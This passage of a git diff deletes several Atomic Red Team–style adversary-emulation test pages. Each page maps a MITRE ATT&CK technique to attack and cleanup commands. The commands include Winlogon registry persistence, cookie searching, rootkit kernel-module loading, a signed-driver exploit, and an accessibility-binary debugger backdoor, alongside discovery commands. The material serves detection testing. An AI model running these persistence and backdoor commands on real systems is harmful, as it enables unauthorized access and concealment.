-| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
-PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
-
-Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| binary_to_execute | Path of notification package to execute | Path | C:&#92;Windows&#92;Temp&#92;atomicNotificationPackage.dll|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1005.md b/Atomic_Threat_Coverage/Triggers/T1005.md
deleted file mode 100644
index 82b5e65..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1005.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# T1005 - Data from Local System
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
-<blockquote>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
-
-Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)
-
-
-<br/>
-
-## Atomic Test #1 - Search macOS Safari Cookies
-This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
-
-Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| search_string | String to search Safari cookies to find. | string | coinbase|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cd ~/Library/Cookies
-grep -q "#{search_string}" "Cookies.binarycookies"
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1007.md b/Atomic_Threat_Coverage/Triggers/T1007.md
deleted file mode 100644
index 0655cf8..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1007.md
+++ /dev/null
@@ -1,74 +0,0 @@
-# T1007 - System Service Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
-<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
-
-- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
-
-
-<br/>
-
-## Atomic Test #1 - System Service Discovery
-Identify system services.
-
-Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-tasklist.exe
-sc query
-sc query state= all
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Service Discovery - net.exe
-Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
-
-Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path of file to hold net.exe output | Path | C:&#92;Windows&#92;Temp&#92;service-list.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net.exe start >> #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del /f /q /s #{output_file} >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1009.md b/Atomic_Threat_Coverage/Triggers/T1009.md
deleted file mode 100644
index 6ed99f4..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1009.md
+++ /dev/null
@@ -1,55 +0,0 @@
-# T1009 - Binary Padding
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
-<blockquote>Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
-
-Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
-
-
-<br/>
-
-## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
-Uses dd to add a zero to the binary to change the hash.
-
-Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The binary must exist on disk at specified location (#{file_to_pad})
-##### Check Prereq Commands:
-```bash
-if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-cp /bin/ls /tmp/evil-binary
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1010.md b/Atomic_Threat_Coverage/Triggers/T1010.md
deleted file mode 100644
index 4e4ac07..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1010.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# T1010 - Application Window Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
-<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
-
-In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
-
-
-<br/>
-
-## Atomic Test #1 - List Process Main Windows - C# .NET
-Compiles and executes C# code to list main window titles associated with each process.
-
-Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
-| output_file_name | Name of output binary | string | $env:TEMP&#92;T1010.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
-#{output_file_name}
-```
-
-#### Cleanup Commands:
-```cmd
-del /f /q /s #{output_file_name} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{input_source_code}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1012.md b/Atomic_Threat_Coverage/Triggers/T1012.md
deleted file mode 100644
index e9a5b9f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1012.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# T1012 - Query Registry
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
-<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
-
-The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Query Registry
-Query Windows Registry.
-
-Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
-
-References:
-
-https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
-
-https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
-
-http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
-
-https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
-reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
-reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
-reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
-reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
-reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
-reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
-reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
-reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
-reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
-reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
-reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1014.md b/Atomic_Threat_Coverage/Triggers/T1014.md
deleted file mode 100644
index 09670a9..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1014.md
+++ /dev/null
@@ -1,158 +0,0 @@
-# T1014 - Rootkit
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
-<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
-
-Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Loadable Kernel Module based Rootkit](#atomic-test-1---loadable-kernel-module-based-rootkit)
-
-- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
-
-- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
-
-
-<br/>
-
-## Atomic Test #1 - Loadable Kernel Module based Rootkit
-Loadable Kernel Module based Rootkit
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
-| rootkit_name | Module name | String | T1014|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
-| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo insmod #{rootkit_path}
-```
-
-#### Cleanup Commands:
-```sh
-sudo rmmod #{rootkit_name}
-```
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
-##### Check Prereq Commands:
-```bash
-if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
-cp #{rootkit_source_path}/* #{temp_folder}/
-cd #{temp_folder}; make
-mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
-[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Loadable Kernel Module based Rootkit
-Loadable Kernel Module based Rootkit
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
-| rootkit_name | Module name | String | T1014|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
-| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo modprobe #{rootkit_name}
-```
-
-#### Cleanup Commands:
-```sh
-sudo modprobe -r #{rootkit_name}
-sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
-sudo depmod -a
-```
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
-##### Check Prereq Commands:
-```bash
-if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
-cp #{rootkit_source_path}/* #{temp_folder}/
-cd #{temp_folder}; make        
-sudo cp #{temp_folder}/#{rootkit_name}.ko /lib/modules/$(uname -r)/
-[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
-sudo depmod -a
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Windows Signed Driver Rootkit Test
-This test exploits a signed driver to execute code in Kernel.
-SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
-We leverage the work done here:
-https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
-The hash of our PoC Exploit is
-SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
-This will simulate hiding a process.
-It would be wise if you only run this in a test environment
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| driver_path | Path to the vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-puppetstrings #{driver_path}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1015.md b/Atomic_Threat_Coverage/Triggers/T1015.md
deleted file mode 100644
index 95fc877..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1015.md
+++ /dev/null
@@ -1,81 +0,0 @@
-# T1015 - Accessibility Features
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015)
-<blockquote>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
-
-Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
-
-Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:
-
-For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
-
-For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
-
-Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
-
-* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
-* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
-* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
-* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
-* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code></blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes)
-
-
-<br/>
-
-## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes
-Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
-
-Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe|
-| attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:&#92;windows&#92;system32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$input_table = "#{parent_list}".split(",")
-$Name = "Debugger"
-$Value = "#{attached_process}"
-Foreach ($item in $input_table){   
-  $item = $item.trim()
-  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-  IF(!(Test-Path $registryPath))
-  {
-    New-Item -Path $registryPath -Force
-    New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-  }
-  ELSE
-  {
-    New-ItemProperty -Path $registryPath -Name $name -Value $Value
-  }
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$input_table = "#{parent_list}".split(",")
-Foreach ($item in $input_table)
-{
-  $item = $item.trim()
-  reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
-}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1016.md b/Atomic_Threat_Coverage/Triggers/T1016.md
deleted file mode 100644
index fb09188..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1016.md
+++ /dev/null
@@ -1,209 +0,0 @@
-# T1016 - System Network Configuration Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
-<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
-
-Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)
-
-- [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)
-
-- [Atomic Test #3 - System Network Configuration Discovery](#atomic-test-3---system-network-configuration-discovery)
-
-- [Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)](#atomic-test-4---system-network-configuration-discovery-trickbot-style)
-
-- [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
-
-
-<br/>
-
-## Atomic Test #1 - System Network Configuration Discovery on Windows
-Identify network configuration information
-
-Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-ipconfig /all
-netsh interface show
-arp -a
-nbtstat -n
-net config
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - List Windows Firewall Rules
-Enumerates Windows Firewall Rules using netsh.
-
-Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-netsh advfirewall firewall show rule name=all
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - System Network Configuration Discovery
-Identify network configuration information.
-
-Upon successful execution, sh will spawn multiple commands and output will be via stdout.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
-if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
-if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
-if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
-Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
-
-Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-ipconfig /all
-net config workstation
-net view /all /domain
-nltest /domain_trusts
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - List Open Egress Ports
-This is to test for what ports are open outbound.  The technique used was taken from the following blog:
-https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
-
-Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|
-| portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
-| output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$ports = Get-content #{port_file}
-$file = "#{output_file}"
-$totalopen = 0
-$totalports = 0
-New-Item $file -Force
-foreach ($port in $ports) {
-    $test = new-object system.Net.Sockets.TcpClient
-    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
-    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
-    $totalports++ | Out-Null
-    if ($test.Connected) {
-        $result = "$port open" 
-        Write-Host -ForegroundColor Green $result
-        $result | Out-File -Encoding ASCII -append $file
-        $totalopen++ | Out-Null
-    }
-    else {
-        $result = "$port closed" 
-        Write-Host -ForegroundColor Red $result
-        $totalclosed++ | Out-Null
-        $result | Out-File -Encoding ASCII -append $file
-    }
-}
-$results = "There were a total of $totalopen open ports out of $totalports ports tested."
-$results | Out-File -Encoding ASCII -append $file
-Write-Host $results
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -ErrorAction ignore "#{output_file}"
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Test requires #{port_file} to exist
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{port_file}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1018.md b/Atomic_Threat_Coverage/Triggers/T1018.md
deleted file mode 100644
index e48b2e6..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1018.md
+++ /dev/null
@@ -1,278 +0,0 @@
-# T1018 - Remote System Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
-<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. 
-
-### Windows
-
-Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the <code>C:\Windows\System32\Drivers\etc\hosts</code> file can be viewed to gain insight into the existing hostname to IP mappings on the system.
-
-### Mac
-
-Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.
-
-### Linux
-
-Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.
-
-### Cloud
-
-In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs with information about remote systems and services.
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Remote System Discovery - net](#atomic-test-1---remote-system-discovery---net)
-
-- [Atomic Test #2 - Remote System Discovery - net group Domain Computers](#atomic-test-2---remote-system-discovery---net-group-domain-computers)
-
